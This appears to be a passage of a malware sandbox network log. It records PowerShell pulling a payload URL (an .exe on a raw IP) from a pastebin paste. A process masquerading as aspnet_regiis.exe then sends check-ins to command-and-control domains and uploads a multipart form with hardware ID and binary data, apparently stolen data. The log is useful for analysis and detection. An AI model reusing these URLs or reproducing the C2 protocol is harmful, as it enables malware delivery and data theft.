2024-11-23 11:47:13 UTC	395	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:13 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 1 Last-Modified: Sat, 23 Nov 2024 11:47:12 GMT Server: cloudflare CF-RAY: 8e70ec5b387f80da-EWR
2024-11-23 11:47:13 UTC	32	IN	Data Raw: 31 61 0d 0a 68 74 74 70 3a 2f 2f 31 39 32 2e 38 31 2e 31 33 32 2e 37 36 2f 62 2e 65 78 65 0d 0a Data Ascii: 1ahttp://192.81.132.76/b.exe
2024-11-23 11:47:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.20.3.235	443	7664	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:13 UTC	74	OUT	GET /raw/NQfY14gm HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-11-23 11:47:13 UTC	395	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:13 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 1 Last-Modified: Sat, 23 Nov 2024 11:47:12 GMT Server: cloudflare CF-RAY: 8e70ec5b2db20f6b-EWR
2024-11-23 11:47:13 UTC	32	IN	Data Raw: 31 61 0d 0a 68 74 74 70 3a 2f 2f 31 39 32 2e 38 31 2e 31 33 32 2e 37 36 2f 62 2e 65 78 65 0d 0a Data Ascii: 1ahttp://192.81.132.76/b.exe
2024-11-23 11:47:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	104.20.3.235	443	7664	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:15 UTC	50	OUT	GET /raw/NQfY14gm HTTP/1.1 Host: pastebin.com
2024-11-23 11:47:15 UTC	395	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:15 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 3 Last-Modified: Sat, 23 Nov 2024 11:47:12 GMT Server: cloudflare CF-RAY: 8e70ec65ec2a0c86-EWR
2024-11-23 11:47:15 UTC	32	IN	Data Raw: 31 61 0d 0a 68 74 74 70 3a 2f 2f 31 39 32 2e 38 31 2e 31 33 32 2e 37 36 2f 62 2e 65 78 65 0d 0a Data Ascii: 1ahttp://192.81.132.76/b.exe
2024-11-23 11:47:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	172.67.184.174	443	8084	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:25 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: revirepart.biz
2024-11-23 11:47:25 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-23 11:47:26 UTC	1011	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9hs4k823ktjtlfcb3j4k9ffqmu; expires=Wed, 19 Mar 2025 05:34:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YzpAKae7zpFHdaeZ6xNLjzKSLWMP3ZvvktOLcH%2BU0pVdHLGbylxHPZwq94wgq%2F2D2QymOtYfxBIzm7ErC0JUd2JDJb5Wbcm5VmjqhPjkn%2BBY2Z3ViyzhguNLK1BcWY9BmQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e70eca4ac830f7d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1617&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1787025&cwnd=235&unsent_bytes=0&cid=12084ca3a8107136&ts=911&x=0"
2024-11-23 11:47:26 UTC	9	IN	Data Raw: 34 0d 0a 66 61 69 6c 0d 0a Data Ascii: 4fail
2024-11-23 11:47:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	104.21.88.250	443	8084	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:27 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: frogs-severz.sbs
2024-11-23 11:47:27 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-23 11:47:28 UTC	1007	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jol29481gt9j646crcus34r2ud; expires=Wed, 19-Mar-2025 05:34:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vEIbmNGEwGW3UD0gedtGrOxeR9BsNLSrrySwNF8NIufnqRN%2Bp1WFrMum3uCekpXFAHVyz2cXTOhC2E%2FmlPCwhnjpOSlmGX6%2FwnT3VMRgkPatwUhwsQ6HlttLoX0ki09r8Ooq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e70ecb46de0c328-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1710603&cwnd=177&unsent_bytes=0&cid=988f9e69b54120e8&ts=715&x=0"
2024-11-23 11:47:28 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-23 11:47:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	104.21.88.250	443	8084	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:29 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: frogs-severz.sbs
2024-11-23 11:47:29 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--b8bb860e1ee2&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-11-23 11:47:30 UTC	1013	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1iibvt7s9ui4n5u9sj8nes6dl3; expires=Wed, 19-Mar-2025 05:34:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PEWm3POzF%2BDHD4G%2BePmDaL64yMOc5LwpZBzB7OgfuNOcCFMv%2FhVOcc5%2Fq%2BtChtAfYiznlZtUsqPqelGSLIQZ9XpJ5kJU3gPW%2F5OfCgLW6IunMqlk5xzo4m5EjwxkgMUDvLhY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e70ecc17e757cff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1980&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=986&delivery_rate=1433480&cwnd=207&unsent_bytes=0&cid=d63e6d6b2ac2818b&ts=739&x=0"
2024-11-23 11:47:30 UTC	356	IN	Data Raw: 63 63 62 0d 0a 4b 57 68 30 6e 63 6d 38 67 62 4c 4f 6a 6b 64 4c 52 2b 31 41 72 58 54 56 63 65 45 65 30 6c 32 58 2f 6c 76 72 4d 72 70 6d 38 69 56 53 53 67 4b 2f 38 34 69 74 6b 4c 33 72 5a 58 45 68 6a 43 7a 65 45 66 6c 54 67 48 72 77 5a 2f 47 66 4e 35 68 58 6c 6b 53 45 53 41 74 53 45 76 79 6c 7a 2b 53 65 37 4f 73 2f 61 58 32 32 4f 34 38 52 75 31 50 62 50 4c 63 33 39 5a 38 33 69 56 50 52 43 59 4a 4a 53 67 41 59 2b 71 48 5a 34 74 61 76 34 69 6f 75 49 6f 67 68 78 78 71 38 48 49 6c 7a 38 48 47 31 6d 79 48 4a 43 4a 67 72 6c 31 46 49 4a 52 58 75 6f 70 37 38 6e 72 57 73 49 69 56 6c 31 32 4c 4d 45 62 63 64 68 33 71 35 4e 66 2b 57 50 34 68 57 30 42 61 62 51 30 45 41 46 76 6d 67 30 2b 76 43 6f 75 67 74 4a 53 53 43 49 59 39 59 39 78 53 62 50 4f 68 2f 70 71 34 36 6d 45 Data Ascii: ccbKWh0ncm8gbLOjkdLR+1ArXTVceEe0l2X/lvrMrpm8iVSSgK/84itkL3rZXEhjCzeEflTgHrwZ/GfN5hXlkSESAtSEvylz+Se7Os/aX22O48Ru1PbPLc39Z83iVPRCYJJSgAY+qHZ4tav4iouIoghxxq8HIlz8HG1myHJCJgrl1FIJRXuop78nrWsIiVl12LMEbcdh3q5Nf+WP4hW0BabQ0EAFvmg0+vCougtJSSCIY9Y9xSbPOh/pq46mE
2024-11-23 11:47:30 UTC	1369	IN	Data Raw: 51 76 75 51 75 49 69 43 64 4b 63 59 62 75 68 4f 4f 64 72 38 38 39 5a 73 7a 67 31 2f 53 41 4a 31 4b 54 51 6f 57 76 2b 57 65 35 4d 6a 73 74 47 55 4b 49 4a 38 6c 77 77 44 31 4b 63 4e 6a 2f 69 61 31 6d 7a 58 4a 43 4a 67 4d 6c 55 52 49 41 52 6e 38 6f 39 58 78 30 4c 37 71 4b 43 77 33 69 53 66 42 48 4c 51 42 69 58 4b 32 50 50 79 58 4d 49 78 58 33 45 54 65 42 30 77 53 56 71 66 72 2f 2b 37 62 6f 4f 59 79 4b 57 57 51 62 4e 5a 57 73 42 2f 44 4a 50 41 37 39 4a 67 34 6a 56 37 57 41 4a 78 42 52 51 63 5a 2b 61 48 65 35 4e 71 6b 35 43 51 6b 4c 6f 41 69 79 68 75 7a 46 59 39 39 74 58 2b 37 33 44 36 52 45 49 42 45 76 6b 42 49 47 46 54 4b 71 4e 44 74 31 37 71 73 4f 6d 63 38 7a 79 58 44 56 75 39 54 6a 58 6d 2f 4c 66 53 4f 50 49 64 43 31 41 47 57 53 6b 67 45 46 76 71 73 30 2b Data Ascii: QvuQuIiCdKcYbuhOOdr889Zszg1/SAJ1KTQoWv+We5MjstGUKIJ8lwwD1KcNj/ia1mzXJCJgMlURIARn8o9Xx0L7qKCw3iSfBHLQBiXK2PPyXMIxX3ETeB0wSVqfr/+7boOYyKWWQbNZWsB/DJPA79Jg4jV7WAJxBRQcZ+aHe5Nqk5CQkLoAiyhuzFY99tX+73D6REIBEvkBIGFTKqNDt17qsOmc8zyXDVu9TjXm/LfSOPIdC1AGWSkgEFvqs0+
2024-11-23 11:47:30 UTC	1369	IN	Data Raw: 4f 6d 63 38 7a 79 58 44 56 75 39 54 6a 33 57 77 4e 50 2b 59 4f 59 35 64 33 51 65 58 52 45 59 4e 48 50 47 73 32 75 2f 5a 6f 65 6f 6c 4c 69 47 4b 4d 4d 6f 66 75 78 2f 44 4d 76 41 34 37 64 78 68 79 58 2f 66 45 70 4e 6f 53 42 73 66 76 37 53 51 2b 70 43 72 34 47 56 78 5a 59 67 6e 78 78 32 78 47 34 4e 75 74 54 48 2b 6e 54 4f 50 55 64 55 49 6c 6b 64 4b 43 68 44 7a 71 39 6e 6b 77 72 37 70 49 7a 73 76 7a 32 79 50 45 61 39 54 32 7a 79 47 4c 2b 4b 4e 4c 38 74 6c 32 77 71 65 51 46 31 4b 43 62 47 79 6e 75 54 63 37 4c 52 6c 49 69 57 44 4a 63 63 51 73 78 75 4d 63 37 6b 74 39 4a 41 33 6d 31 66 59 44 5a 35 49 52 77 4d 62 2b 4b 62 56 36 64 32 6f 36 79 52 70 61 38 38 6c 31 31 62 76 55 37 56 73 76 54 50 62 6c 7a 57 41 45 4d 64 4b 69 51 64 4d 42 6c 61 6e 36 39 72 76 32 4b 62 Data Ascii: Omc8zyXDVu9Tj3WwNP+YOY5d3QeXREYNHPGs2u/ZoeolLiGKMMofux/DMvA47dxhyX/fEpNoSBsfv7SQ+pCr4GVxZYgnxx2xG4NutTH+nTOPUdUIlkdKChDzq9nkwr7pIzsvz2yPEa9T2zyGL+KNL8tl2wqeQF1KCbGynuTc7LRlIiWDJccQsxuMc7kt9JA3m1fYDZ5IRwMb+KbV6d2o6yRpa88l11bvU7VsvTPblzWAEMdKiQdMBlan69rv2Kb
2024-11-23 11:47:30 UTC	188	IN	Data Raw: 49 73 6c 79 78 43 34 55 38 30 38 74 79 65 31 78 48 6d 6d 64 2b 31 47 73 58 30 4c 46 56 6a 6d 36 39 6e 76 6b 50 53 73 4b 53 6f 70 68 79 33 4a 48 37 73 5a 69 6e 65 38 4e 50 47 51 4d 49 78 57 32 51 47 56 52 6b 38 47 48 50 6d 6f 33 65 7a 66 6f 2b 52 6c 5a 32 57 49 4f 6f 39 4f 39 7a 61 55 64 37 34 35 74 59 4e 33 6b 42 44 66 43 4e 41 66 43 77 59 66 2b 61 33 62 37 39 47 71 35 43 41 68 49 59 34 6b 79 52 57 34 46 34 5a 39 76 7a 76 35 6b 6a 4f 49 55 64 51 50 6e 30 78 4f 53 6c 69 2f 72 4d 61 6a 69 4f 7a 64 4a 6a 38 79 6e 79 36 50 43 66 6b 4b 77 33 75 38 66 36 33 0d 0a Data Ascii: IslyxC4U808tye1xHmmd+1GsX0LFVjm69nvkPSsKSophy3JH7sZine8NPGQMIxW2QGVRk8GHPmo3ezfo+RlZ2WIOo9O9zaUd745tYN3kBDfCNAfCwYf+a3b79Gq5CAhIY4kyRW4F4Z9vzv5kjOIUdQPn0xOSli/rMajiOzdJj8yny6PCfkKw3u8f63
2024-11-23 11:47:30 UTC	1369	IN	Data Raw: 33 32 33 39 0d 0a 63 4f 4a 74 61 30 67 71 56 53 45 34 4a 47 66 69 6d 32 4f 2f 61 70 65 51 6a 4a 69 79 64 49 63 4d 59 73 42 32 50 63 72 30 31 39 70 46 35 78 78 44 66 48 4e 41 66 43 79 59 52 38 6f 58 56 37 39 66 73 38 32 73 77 5a 59 67 75 6a 30 37 33 48 34 6c 77 75 54 2f 38 6d 54 47 43 57 64 30 46 6d 30 4a 49 44 42 76 77 6f 73 7a 70 30 36 4c 76 4b 53 55 6a 6a 69 48 64 48 72 35 54 7a 54 79 33 4a 37 58 45 65 61 68 65 31 52 43 58 56 77 73 56 57 4f 62 72 32 65 2b 51 39 4b 77 6d 4b 43 71 4d 49 38 49 51 76 68 75 44 65 72 55 77 2b 4a 49 2b 6a 6c 44 56 43 70 39 42 51 77 63 61 39 4b 58 58 35 64 43 74 35 6d 56 6e 5a 59 67 36 6a 30 37 33 49 34 42 38 73 43 53 31 67 33 65 51 45 4e 38 49 30 42 38 4c 47 42 7a 32 71 39 33 73 31 36 6a 6e 4b 53 77 67 67 43 48 47 45 37 34 64 Data Ascii: 3239cOJta0gqVSE4JGfim2O/apeQjJiydIcMYsB2Pcr019pF5xxDfHNAfCyYR8oXV79fs82swZYguj073H4lwuT/8mTGCWd0Fm0JIDBvwoszp06LvKSUjjiHdHr5TzTy3J7XEeahe1RCXVwsVWObr2e+Q9KwmKCqMI8IQvhuDerUw+JI+jlDVCp9BQwca9KXX5dCt5mVnZYg6j073I4B8sCS1g3eQEN8I0B8LGBz2q93s16jnKSwggCHGE74d
2024-11-23 11:47:30 UTC	1369	IN	Data Raw: 4f 31 78 48 6d 49 58 4e 63 48 6e 30 52 49 43 78 7a 74 75 64 4c 71 32 4b 6e 67 4c 69 63 6a 6e 53 54 41 48 37 51 51 69 6e 75 34 4d 2f 2b 66 50 73 6b 65 6d 41 4f 49 42 78 4e 4b 4e 65 69 37 30 36 50 50 34 76 56 6c 4c 69 6e 50 65 6f 38 65 75 68 75 4a 65 4c 63 79 38 70 6f 77 6d 31 6e 64 43 70 42 44 51 41 55 51 2b 36 6a 65 38 64 61 6f 35 43 59 6b 4b 49 45 68 79 31 62 35 55 34 52 6b 38 47 65 31 72 6a 53 48 53 39 63 44 67 55 30 4c 46 56 6a 6d 36 39 6e 76 6b 50 53 73 49 53 63 33 68 43 50 45 48 62 6b 55 6a 48 6d 36 50 2f 71 59 4f 6f 64 62 32 51 65 59 53 6b 59 45 48 50 61 69 32 65 2f 55 71 36 78 72 61 53 4b 58 59 70 64 57 6e 44 4b 75 55 4c 63 6c 74 59 4e 33 6b 42 44 66 43 4e 41 66 43 77 59 66 38 36 48 56 35 4e 71 69 35 53 73 69 4e 35 30 68 79 78 57 2b 45 49 52 31 76 Data Ascii: O1xHmIXNcHn0RICxztudLq2KngLicjnSTAH7QQinu4M/+fPskemAOIBxNKNei706PP4vVlLinPeo8euhuJeLcy8powm1ndCpBDQAUQ+6je8dao5CYkKIEhy1b5U4Rk8Ge1rjSHS9cDgU0LFVjm69nvkPSsISc3hCPEHbkUjHm6P/qYOodb2QeYSkYEHPai2e/Uq6xraSKXYpdWnDKuULcltYN3kBDfCNAfCwYf86HV5Nqi5SsiN50hyxW+EIR1v
2024-11-23 11:47:30 UTC	1369	IN	Data Raw: 35 78 78 44 66 48 4e 41 66 43 79 63 61 2b 49 4c 5a 2b 4a 43 7a 6f 6a 78 70 49 6f 4e 69 6c 31 61 32 47 49 6c 7a 76 54 7a 7a 6e 7a 4b 4d 57 74 6b 44 6d 45 70 5a 43 52 6e 77 72 39 37 73 31 71 72 74 4b 69 38 69 68 69 50 48 45 66 64 64 77 33 75 6f 66 36 33 63 46 34 35 54 33 45 53 50 43 56 4a 4b 45 66 50 72 68 71 50 51 70 75 59 76 4a 79 57 49 4d 4d 6b 66 74 78 43 52 66 37 59 33 38 35 41 31 68 46 6a 52 42 4a 56 4d 52 67 45 62 2b 61 76 56 34 70 44 69 72 43 49 78 5a 64 64 69 2f 68 75 35 46 34 31 2f 6f 44 69 31 67 33 65 51 45 4e 38 49 30 42 38 4c 42 52 2f 74 72 4e 76 72 32 61 7a 69 4c 43 41 69 69 79 48 4f 45 72 73 63 69 6e 2b 34 50 76 32 54 4f 6f 6c 62 30 41 36 52 53 55 35 4b 57 4c 2b 73 78 71 4f 49 37 4d 4d 6d 4c 43 36 4f 59 4f 67 51 73 42 2f 44 59 2f 34 6d 74 5a Data Ascii: 5xxDfHNAfCyca+ILZ+JCzojxpIoNil1a2GIlzvTzznzKMWtkDmEpZCRnwr97s1qrtKi8ihiPHEfddw3uof63cF45T3ESPCVJKEfPrhqPQpuYvJyWIMMkftxCRf7Y385A1hFjRBJVMRgEb+avV4pDirCIxZddi/hu5F41/oDi1g3eQEN8I0B8LBR/trNvr2aziLCAiiyHOErscin+4Pv2TOolb0A6RSU5KWL+sxqOI7MMmLC6OYOgQsB/DY/4mtZ
2024-11-23 11:47:30 UTC	1369	IN	Data Raw: 6d 69 71 62 55 30 78 4b 57 4c 2b 74 6e 72 75 41 34 71 77 68 4f 47 58 58 63 70 31 4e 34 6b 44 55 4c 4f 49 67 75 34 56 35 6e 78 43 41 56 74 34 48 57 55 70 4f 76 2b 7a 64 38 63 4b 71 37 7a 4d 71 59 72 45 63 7a 41 43 36 48 49 68 39 6a 67 48 62 6b 54 69 4b 58 70 6f 31 68 6b 70 62 43 52 50 34 6c 65 44 74 31 37 6a 72 4b 79 38 6c 7a 32 79 50 47 66 64 4c 75 6a 7a 34 66 38 72 53 65 5a 45 51 67 45 53 6c 52 45 55 45 45 65 6d 36 6b 38 44 47 6f 65 4d 75 4b 47 58 42 59 73 6c 57 37 30 50 4e 50 4c 51 75 74 63 52 70 32 77 75 4e 56 38 63 58 47 52 56 59 35 75 76 49 6f 34 6a 2b 6f 6d 55 37 5a 64 64 69 69 42 69 36 45 6f 42 79 73 79 33 6e 6d 6a 71 66 55 35 38 36 72 6d 5a 47 41 52 72 79 70 4e 58 64 37 6f 33 68 4c 69 55 6f 67 43 6e 78 4b 4b 49 51 6a 58 4b 33 4b 65 54 63 64 38 6c Data Ascii: miqbU0xKWL+tnruA4qwhOGXXcp1N4kDULOIgu4V5nxCAVt4HWUpOv+zd8cKq7zMqYrEczAC6HIh9jgHbkTiKXpo1hkpbCRP4leDt17jrKy8lz2yPGfdLujz4f8rSeZEQgESlREUEEem6k8DGoeMuKGXBYslW70PNPLQutcRp2wuNV8cXGRVY5uvIo4j+omU7ZddiiBi6EoBysy3nmjqfU586rmZGARrypNXd7o3hLiUogCnxKKIQjXK3KeTcd8l
2024-11-23 11:47:30 UTC	1369	IN	Data Raw: 46 59 4c 55 6b 61 74 38 49 75 77 68 2f 79 2b 4f 6d 63 38 7a 7a 53 50 54 75 56 64 77 32 37 77 5a 37 58 62 4f 70 74 43 33 67 65 47 52 41 77 30 4b 4e 71 38 33 66 50 57 72 39 49 62 41 69 6d 4a 4a 64 55 52 73 54 57 6a 50 50 35 2f 2b 74 78 68 73 42 43 51 52 4b 38 4a 43 78 4a 57 70 2b 76 72 34 4e 36 69 36 7a 4d 34 61 4b 6f 31 7a 41 61 78 45 4d 4d 79 38 44 6d 31 78 47 6e 48 45 4e 77 56 30 42 38 62 57 45 32 71 2b 49 6d 7a 67 72 4f 69 50 47 6b 7a 7a 33 71 64 57 50 63 42 77 79 54 77 65 50 61 4f 4b 34 39 54 7a 67 66 58 65 58 55 73 46 65 36 68 2f 2b 37 41 71 39 49 62 50 43 61 42 4c 4d 67 41 70 6c 50 4e 50 4c 39 2f 72 61 56 35 77 52 7a 65 42 34 59 48 64 45 52 57 35 2b 75 47 6f 2b 57 76 34 69 73 75 4d 35 35 76 36 52 57 6d 47 61 4a 78 6f 44 69 31 30 6e 6d 50 45 49 42 58 Data Ascii: FYLUkat8Iuwh/y+Omc8zzSPTuVdw27wZ7XbOptC3geGRAw0KNq83fPWr9IbAimJJdURsTWjPP5/+txhsBCQRK8JCxJWp+vr4N6i6zM4aKo1zAaxEMMy8Dm1xGnHENwV0B8bWE2q+ImzgrOiPGkzz3qdWPcBwyTwePaOK49TzgfXeXUsFe6h/+7Aq9IbPCaBLMgAplPNPL9/raV5wRzeB4YHdERW5+uGo+Wv4isuM55v6RWmGaJxoDi10nmPEIBX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	104.21.88.250	443	8084	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:32 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=F7T7SFWO3V8ZTN3AJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18164 Host: frogs-severz.sbs
2024-11-23 11:47:32 UTC	15331	OUT	Data Raw: 2d 2d 46 37 54 37 53 46 57 4f 33 56 38 5a 54 4e 33 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 34 41 38 30 38 39 45 36 45 45 39 34 31 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 46 37 54 37 53 46 57 4f 33 56 38 5a 54 4e 33 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 37 54 37 53 46 57 4f 33 56 38 5a 54 4e 33 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 Data Ascii: --F7T7SFWO3V8ZTN3AJContent-Disposition: form-data; name="hwid"35C4A8089E6EE941FF1C6333321FCDD9--F7T7SFWO3V8ZTN3AJContent-Disposition: form-data; name="pid"2--F7T7SFWO3V8ZTN3AJContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e
2024-11-23 11:47:32 UTC	2833	OUT	Data Raw: cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b Data Ascii: xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{
2024-11-23 11:47:33 UTC	1017	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t31qds1gpumgfb32j5c0hpm5qd; expires=Wed, 19-Mar-2025 05:34:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=85E8%2F4RFZLNNZEmecvzb%2Bj%2FNY6QDuQTTj7rItbjWl0XYH7H%2BHEwU1ngu7NlsN4CiszAxZKR5%2FbuFGGiT4ybwmS8hYMy8GFlftxc5ClAPmS2BZR7D74533PJ%2F0R7ktDAg7CzE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e70eccf68e3438a-EWR alt-svc: h3=":443"; ma=86400 server-timing: 